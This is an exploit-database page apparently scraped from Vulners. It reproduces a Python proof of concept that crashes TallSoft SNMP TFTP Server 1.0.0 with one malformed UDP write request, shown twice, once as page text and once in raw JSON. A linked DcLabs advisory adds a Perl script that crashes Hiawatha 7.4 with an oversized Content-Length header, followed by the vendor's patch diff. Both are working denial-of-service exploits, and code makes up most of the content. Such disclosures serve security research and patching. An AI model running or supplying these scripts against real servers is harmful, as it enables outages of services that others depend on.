Search...

TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service

2016-03-28T00:00:00

ID 1337DAY-ID-25902
Type zdt
Reporter Charley Celice
Modified 2016-03-28T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            # Exploit Title: TallSoft SNMP TFTP Server 1.0.0 - DoS
# Date: 28-03-2016
# Software Link: http://www.tallsoft.com/snmp_tftpserver.exe
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Credits: Based off TallSoft Quick TFTP Server 2.2 DoS
#
# Category: Denial of Service
# Tested on: Windows XP SP3 English
# Details: Remotely crash TallSoft SNMP TFTP Server
 
from socket import *
import sys, select
 
address = ('127.0.0.1', 69)
 
# sufficient for the crash to work
crash = "\x00\x02\x00"
crash += "\x41"*1019
  
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.sendto(crash, address)

#  0day.today [2018-01-09]  #

JSON Vulners Source

Initial Source

{"sourceData": "# Exploit Title: TallSoft SNMP TFTP Server 1.0.0 - DoS\r\n# Date: 28-03-2016\r\n# Software Link: http://www.tallsoft.com/snmp_tftpserver.exe\r\n# Exploit Author: Charley Celice (stmerry)\r\n# Contact: https://twitter.com/charleycelice\r\n#\r\n# Credits: Based off TallSoft Quick TFTP Server 2.2 DoS\r\n#\r\n# Category: Denial of Service\r\n# Tested on: Windows XP SP3 English\r\n# Details: Remotely crash TallSoft SNMP TFTP Server\r\n \r\nfrom socket import *\r\nimport sys, select\r\n \r\naddress = ('127.0.0.1', 69)\r\n \r\n# sufficient for the crash to work\r\ncrash = \"\\x00\\x02\\x00\"\r\ncrash += \"\\x41\"*1019\r\n \r\nserver_socket = socket(AF_INET, SOCK_DGRAM)\r\nserver_socket.sendto(crash, address)\n\n# 0day.today [2018-01-09] #", "history": [], "description": "Exploit for windows platform in category dos / poc", "sourceHref": "https://0day.today/exploit/25902", "reporter": "Charley Celice", "href": "https://0day.today/exploit/description/25902", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "b0d3d3a91f21189719037cf41ad6dbfa"}, {"key": "href", "hash": "b1de174dd54f859637261f9db553ccd8"}, {"key": "modified", "hash": "a3c11e3c020c0dea694e677f35c55dd0"}, {"key": "published", "hash": "a3c11e3c020c0dea694e677f35c55dd0"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "99259bf1fd0b1a667222012c32e076d1"}, {"key": "sourceData", "hash": "324326472c6bb40b30f6e6fad6807471"}, {"key": "sourceHref", "hash": "bce127b50941ded270cb00f6b5f14bc0"}, {"key": "title", "hash": "253228c24d30ab10a2d6e25ed46a1c91"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 3, "references": [], "lastseen": "2018-01-09T17:30:47", "published": "2016-03-28T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-25902", "hash": "c985df1850a8c5dc93934202f9cbd2866c869d3ed79191311193c1b232eeb3e0", "modified": "2016-03-28T00:00:00", "title": "TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-01-09T17:30:47"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11494", "SECURITYVULNS:DOC:25902"]}], "modified": "2018-01-09T17:30:47"}, "vulnersScore": -0.0}}

{"securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "description": "[Discussion]\r\n- DcLabs Security Research Group advises about the following vulnerability(ies):\r\n\r\n[Software]\r\n- Hiawatha WebServer 7.4\r\n\r\n[Vendor Product Description]\r\n- Hiawatha is an open source webserver with a focus on security. I\r\nstarted Hiawatha in January 2002. Before that time, I had used several\r\nwebservers, but I didn't like them. They had unlogical, almost cryptic\r\nconfiguration syntax and none of them gave me a good feeling about\r\ntheir security and robustness. So, I decided it was time to write my\r\nown webserver. I never thought that my webserver would become what it\r\nis today, but I enjoyed working on it and liked to have my own open\r\nsource project. In the years that followed, Hiawatha became a fully\r\nfunctional webserver.\r\n\r\n- Source: http://www.hiawatha-webserver.org/files/hiawatha-7.4.tar.gz\r\n\r\n[Advisory Timeline]\r\n\r\n- 02/24/2011 ->\u00a0Advisory sent to vendor.\r\n- 02/24/2011 ->\u00a0Vendor response.\r\n-\u00a002/25/2011 ->\u00a0Patch suggested by vendor.\r\n- 03/04/2011 -> Advisory published.\r\n\r\n[Bug Summary]\r\n\r\n- Content-Length entity-header filed miscalculation.\r\n\r\n[Impact]\r\n\r\n- Low\r\n\r\n[Affected Version]\r\n\r\n- 7.4\r\n- Prior versions can also be affected but weren't tested.\r\n\r\n[Bug Description and Proof of Concept]\r\n\r\n- The web server crashes while sending specially crafted HTTP requests\r\nleading to Denial of Service.\r\n\r\n[PoC]\r\n\r\n# Hiawatha Web Server 7.4\r\n#!/usr/bin/perl\r\nuse IO::Socket;\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0if (@ARGV < 1) {\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0usage();\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0}\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0$ip \u00a0 \u00a0 = $ARGV[0];\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0$port \u00a0 = $ARGV[1];\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0print "[+] Sending request...\n";\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>\r\n"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0print $socket "OPTIONS * HTTP/1.1\r\n";\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0print $socket "Host: http://www.dclabs.com.br\r\n";\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0print $socket "Content-Length: 2147483599\r\n\r\n";\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0sleep(3);\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0close($socket);\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0print "[+] Done!\n";\r\n\r\nsub usage() {\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0print "[-] Usage: <". $0 ."> <host> <port>\n";\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0print "[-] Example: ". $0 ." 127.0.0.1 80\n";\r\n\u00a0\u00a0 \u00a0 \u00a0 \u00a0exit;\r\n}\r\n\r\nAll flaws described here were discovered and researched by:\r\nRodrigo Escobar aka ipax.\r\nDcLabs Security Research Group\r\nipax (at) dclabs <dot> com <dot> br\r\n\r\n[Patch(s) / Workaround]\r\n\r\n-- hiawatha.c --\r\n\r\n-- BEGIN --\r\n20a21\r\n> #include <limits.h>\r\n421c422\r\n< \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 if\r\n(content_length < 0) {\r\n---\r\n> \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 if ((content_length < 0) || (INT_MAX -\r\n> content_length -2 <= header_length)) {\r\n-- END --\r\n\r\n[Greetz]\r\n\r\nDcLabs Security Research Group.\r\n\r\n--\r\nRodrigo Escobar (ipax)\r\nPentester/Researcher Security Team @ DcLabs\r\nhttp://www.dclabs.com.br", "modified": "2011-03-10T00:00:00", "published": "2011-03-10T00:00:00", "id": "SECURITYVULNS:DOC:25902", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25902", "title": "[DCA-2011-0006] Hiawatha 7.4 - Denial-of-Service", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "description": "Integer overflow via Content-Length.", "modified": "2011-03-10T00:00:00", "published": "2011-03-10T00:00:00", "id": "SECURITYVULNS:VULN:11494", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11494", "title": "Hiawatha Web-server integer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}